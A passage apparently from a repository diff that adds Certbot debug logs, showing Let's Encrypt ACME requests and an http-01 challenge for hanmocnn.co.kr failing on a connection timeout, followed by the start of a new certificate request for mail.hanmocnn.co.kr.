2026-02-14 23:56:10,065:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822
|
||||||
|
2026-02-14 23:56:10,066:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:09 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 822
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: NeKnt8TGCjx_fZhQ5WDhl6vE45VknmXThsT1pOTmkYxO0Y0ehxU
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:56:04Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:10,066:DEBUG:acme.client:Storing nonce: NeKnt8TGCjx_fZhQ5WDhl6vE45VknmXThsT1pOTmkYxO0Y0ehxU
|
||||||
|
2026-02-14 23:56:10,066:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'}
|
||||||
|
2026-02-14 23:56:13,067:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:56:13,072:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0NqeF9mWmhRNVdEaGw2dkU0NVZrbm1YVGhzVDFwT1Rta1l4TzBZMGVoeFUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
|
||||||
|
"signature": "X4fvammVhgMxlJAAaYpyehvxOy40N9oRAHl5Ug7k032b59S1NIAjoffSB9EKi7xJ7B8SJCxU-oFwILoU1Ldm-vikMwRkEtTMIMGWMdmy3WNZD4R0nj5yodIgWh5x3W5Pxc77hcYK6tiNGAtA92Ui3kgRrkMmFlFrJN-qummEA77X2Yhmn56pcGoH5xSJooAG4WifWgRWVbYz1vsGRHDctVKaKMb5-99OBsw-QLVJ_mzMvzD73vNM7OsVNNM-tmhDq_pmyJ1a4aJQN5-7CLG9pfaaDVAxrZDHjeTsQD3MwoGQ7xY5U59h2o8rgIB8TYefEiUNBom8EMyayTYhGFGfOw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:13,236:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822
|
||||||
|
2026-02-14 23:56:13,237:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:13 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 822
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: 4AH-2vvBWmoNXqbP_G__zB5zN3RERigaNgY-khTArYZDgbv2X_k
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:56:04Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:13,237:DEBUG:acme.client:Storing nonce: 4AH-2vvBWmoNXqbP_G__zB5zN3RERigaNgY-khTArYZDgbv2X_k
|
||||||
|
2026-02-14 23:56:13,238:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'}
|
||||||
|
2026-02-14 23:56:16,238:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:56:16,243:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2Qldtb05YcWJQX0dfX3pCNXpOM1JFUmlnYU5nWS1raFRBcllaRGdidjJYX2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
|
||||||
|
"signature": "VUS-lzk9Z3loxvUEDVuMC_FAo4nIIaN6ASpX2W6ee1LV95WxuuirwwVvgC5LNneJKctrI_sZWZHmsg_gdbPaF1TVPDHoNeYy-q4CahPRRibPnTeELJ1Pwb9QB6IU-H6cSswTZLKwwerZpTWE70RElAyE4SJVniuQ9R0ZyyXqOUoYGCQDrqLTgaRyjMVi3gPrmyXAOXQGo8wxe_ptEaxaDOkyhvCXuZ1fU6TIz1HMFnBy4zIzkEbFiZlqR1dPOwJe5YPRRGgaISJyWqb9f_ksyRJWNrTAVL0tUN2fKx8bzrRmSUOr3X_O68f53h_Dda1RZ3gxmIBcxjcoAZbTR2hRHw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:16,406:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822
|
||||||
|
2026-02-14 23:56:16,407:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:16 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 822
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: 4AH-2vvBMeztInZzGTaqtySBQba_zA2UlxHA7wD9hPW6YEGqHVc
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:56:04Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:16,420:DEBUG:acme.client:Storing nonce: 4AH-2vvBMeztInZzGTaqtySBQba_zA2UlxHA7wD9hPW6YEGqHVc
|
||||||
|
2026-02-14 23:56:16,421:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'}
|
||||||
|
2026-02-14 23:56:19,422:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:56:19,426:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2Qk1lenRJblp6R1RhcXR5U0JRYmFfekEyVWx4SEE3d0Q5aFBXNllFR3FIVmMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
|
||||||
|
"signature": "NPoDinMY-lpRRfnPp-YkArm_aAxytG8RLCQM_eQfhXpDeelMX2mG-OwZceFZy9-wn6yWgqmKN-7RPZ3pWl_5xIAqqLIB6LAaE3nPiQkU5AfViP7KOE2WumQgLfPLtuqa73v9JD2tJpV7Lbxo-X_EidM6Rs6t9vdjTLmY7uYwFUvEb7SzpHISaehnrj8aA17I8qJgLBhGtyvHbzhnv7Nira9Lw2TWOlO1lIMgHtLMFvuyFnCzOkfEqvVTjzWN7RhKQ_WM7hj2A3XSw81N4iYhIs8E68Mg2Z8fHHu7VCrGjqgWBifEKCrOAjwieKsvb66nKsSsWSchbIo26PNfwhCXVg",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:19,603:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 1065
|
||||||
|
2026-02-14 23:56:19,603:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:56:19 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 1065
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: NeKnt8TGK04pYxuaJhFJTtcVaz449MbsEz3fo4B6O33Ocq9f2Jk
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "invalid",
|
||||||
|
"expires": "2026-02-21T23:56:04Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
|
||||||
|
"status": "invalid",
|
||||||
|
"validated": "2026-02-14T23:56:05Z",
|
||||||
|
"error": {
|
||||||
|
"type": "urn:ietf:params:acme:error:connection",
|
||||||
|
"detail": "221.150.111.87: Fetching http://hanmocnn.co.kr/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0: Timeout during connect (likely firewall problem)",
|
||||||
|
"status": 400
|
||||||
|
},
|
||||||
|
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0",
|
||||||
|
"validationRecord": [
|
||||||
|
{
|
||||||
|
"url": "http://hanmocnn.co.kr/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0",
|
||||||
|
"hostname": "hanmocnn.co.kr",
|
||||||
|
"port": "80",
|
||||||
|
"addressesResolved": [
|
||||||
|
"221.150.111.87"
|
||||||
|
],
|
||||||
|
"addressUsed": "221.150.111.87"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:56:19,604:DEBUG:acme.client:Storing nonce: NeKnt8TGK04pYxuaJhFJTtcVaz449MbsEz3fo4B6O33Ocq9f2Jk
|
||||||
|
2026-02-14 23:56:19,604:INFO:certbot._internal.auth_handler:Challenge failed for domain hanmocnn.co.kr
|
||||||
|
2026-02-14 23:56:19,604:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='hanmocnn.co.kr')
|
||||||
|
2026-02-14 23:56:19,604:DEBUG:certbot._internal.display.obj:Notifying user:
|
||||||
|
Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems:
|
||||||
|
Identifier: hanmocnn.co.kr
|
||||||
|
Type: connection
|
||||||
|
Detail: 221.150.111.87: Fetching http://hanmocnn.co.kr/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0: Timeout during connect (likely firewall problem)
|
||||||
|
|
||||||
|
Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet.
|
||||||
|
|
||||||
|
2026-02-14 23:56:19,606:DEBUG:certbot._internal.error_handler:Encountered exception:
|
||||||
|
Traceback (most recent call last):
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations
|
||||||
|
self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort)
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations
|
||||||
|
raise errors.AuthorizationError('Some challenges have failed.')
|
||||||
|
certbot.errors.AuthorizationError: Some challenges have failed.
|
||||||
|
|
||||||
|
2026-02-14 23:56:19,606:DEBUG:certbot._internal.error_handler:Calling registered functions
|
||||||
|
2026-02-14 23:56:19,606:INFO:certbot._internal.auth_handler:Cleaning up challenges
|
||||||
|
2026-02-14 23:56:19,606:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0
|
||||||
|
2026-02-14 23:56:19,607:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up
|
||||||
|
2026-02-14 23:56:19,607:DEBUG:certbot._internal.log:Exiting abnormally:
|
||||||
|
Traceback (most recent call last):
|
||||||
|
File "/opt/certbot/bin/certbot", line 6, in <module>
|
||||||
|
sys.exit(main())
|
||||||
|
^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main
|
||||||
|
return internal_main.main(cli_args)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1886, in main
|
||||||
|
return config.func(config, plugins)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1598, in certonly
|
||||||
|
lineage = _get_and_save_cert(le_client, config, sans, certname, lineage)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 143, in _get_and_save_cert
|
||||||
|
lineage = le_client.obtain_and_enroll_certificate(sans, certname)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 533, in obtain_and_enroll_certificate
|
||||||
|
cert, chain, key, _ = self.obtain_certificate(sans)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 434, in obtain_certificate
|
||||||
|
orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 512, in _get_order_and_authorizations
|
||||||
|
authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort)
|
||||||
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations
|
||||||
|
self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort)
|
||||||
|
File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations
|
||||||
|
raise errors.AuthorizationError('Some challenges have failed.')
|
||||||
|
certbot.errors.AuthorizationError: Some challenges have failed.
|
||||||
|
2026-02-14 23:56:19,610:ERROR:certbot._internal.log:Some challenges have failed.
|
||||||
820
npm/data/logs/letsencrypt.log.3
Normal file
820
npm/data/logs/letsencrypt.log.3
Normal file
@@ -0,0 +1,820 @@
|
|||||||
|
2026-02-14 23:36:10,097:DEBUG:certbot._internal.main:certbot version: 5.3.0
|
||||||
|
2026-02-14 23:36:10,098:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
|
||||||
|
2026-02-14 23:36:10,098:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-4', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'mail.hanmocnn.co.kr']
|
||||||
|
2026-02-14 23:36:10,098:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
|
||||||
|
2026-02-14 23:36:10,111:DEBUG:certbot._internal.log:Root logging level set at 30
|
||||||
|
2026-02-14 23:36:10,113:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 23:36:10,113:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
|
||||||
|
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
|
||||||
|
Interfaces: Authenticator, Plugin
|
||||||
|
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
|
||||||
|
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffffb0250390>
|
||||||
|
Prep: True
|
||||||
|
2026-02-14 23:36:10,113:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffffb0250390> and installer None
|
||||||
|
2026-02-14 23:36:10,114:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
|
||||||
|
2026-02-14 23:36:10,346:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
|
||||||
|
2026-02-14 23:36:10,347:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
|
||||||
|
2026-02-14 23:36:10,350:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
|
||||||
|
2026-02-14 23:36:10,925:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
|
||||||
|
2026-02-14 23:36:10,926:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:10 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 1033
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"gl0y9KAY6WE": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
|
||||||
|
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
|
||||||
|
"meta": {
|
||||||
|
"caaIdentities": [
|
||||||
|
"letsencrypt.org"
|
||||||
|
],
|
||||||
|
"profiles": {
|
||||||
|
"classic": "https://letsencrypt.org/docs/profiles#classic",
|
||||||
|
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
|
||||||
|
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
|
||||||
|
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
|
||||||
|
},
|
||||||
|
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
|
||||||
|
"website": "https://letsencrypt.org"
|
||||||
|
},
|
||||||
|
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
|
||||||
|
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
|
||||||
|
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
|
||||||
|
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
|
||||||
|
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:10,927:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for mail.hanmocnn.co.kr
|
||||||
|
2026-02-14 23:36:10,931:DEBUG:acme.client:Requesting fresh nonce
|
||||||
|
2026-02-14 23:36:10,931:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
|
||||||
|
2026-02-14 23:36:11,106:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
|
||||||
|
2026-02-14 23:36:11,106:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:11 GMT
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: QkEzerAfyjd0yzrV6j-gWFKMfQxcQwKY8xlPoqJkffKPGd6xz5E
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
|
||||||
|
2026-02-14 23:36:11,107:DEBUG:acme.client:Storing nonce: QkEzerAfyjd0yzrV6j-gWFKMfQxcQwKY8xlPoqJkffKPGd6xz5E
|
||||||
|
2026-02-14 23:36:11,107:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "mail.hanmocnn.co.kr"\n }\n ]\n}'
|
||||||
|
2026-02-14 23:36:11,113:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnlqZDB5enJWNmotZ1dGS01mUXhjUXdLWTh4bFBvcUprZmZLUEdkNnh6NUUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
|
||||||
|
"signature": "hS7qYt3RRHk1LAi7encEP5ydfY_ml4lMwYzddNWa9F1GJArk2rOQNDaTiZhtZ54ZHgTnFSXD1iaXFNxjKuYOQYmXQQIXHDK3suCaoZvEOTJzneL_V4Vpvq9ai2erj0lgXDDn3h1vy7hmXgYrhVH8FtXENrl17vR1wpu9z2_LHEBd2WDhnD9rZtG14yvstb3WXrTFd32H0UbBLVEiiMvy7rNPUWS_DP-v2HU7MQqbmYfLV5IyMINr8hANSrb-AeygAnnORl2maALqklOsh9qLximoeeNPjQqxn3zi00BCo8vdC6ni2OeYq51NOpEMZx1W4aRKIA0Vl32snJ10d155pQ",
|
||||||
|
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm1haWwuaGFubW9jbm4uY28ua3IiCiAgICB9CiAgXQp9"
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:11,401:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 353
|
||||||
|
2026-02-14 23:36:11,402:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 201
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:11 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 353
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826
|
||||||
|
Replay-Nonce: QkEzerAftIzsnOAR6XedceVkroV5M0_zuPRMcd9TlS3shn1CkbU
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:36:11Z",
|
||||||
